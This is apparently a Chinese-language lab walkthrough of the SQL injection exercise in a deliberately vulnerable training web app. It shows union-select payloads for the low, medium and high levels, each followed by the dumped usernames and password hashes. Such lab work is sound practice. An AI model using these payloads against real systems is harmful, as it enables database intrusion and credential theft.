low
查看源码,可发现是注入点id为字符类型,无验证,直接上:
' union select first_name,password from users#
返回结果如下:
ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
medium
查看源码,发现代码用mysqli_real_escape_string来转义特殊字符,但是此时的注入点id为数值型,不需要用’。修改html源码提交:
<option value="0 union select first_name,password from users">1</option>
返回结果如下:
ID: 0 union select first_name,password from users
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: 0 union select first_name,password from users
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: 0 union select first_name,password from users
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 0 union select first_name,password from users
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 0 union select first_name,password from users
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
high
查看源码,可发现注入点id为字符型,查询记录限1,其实方法和low差不多
' union select first_name,password from users#
返回结果如下:
ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99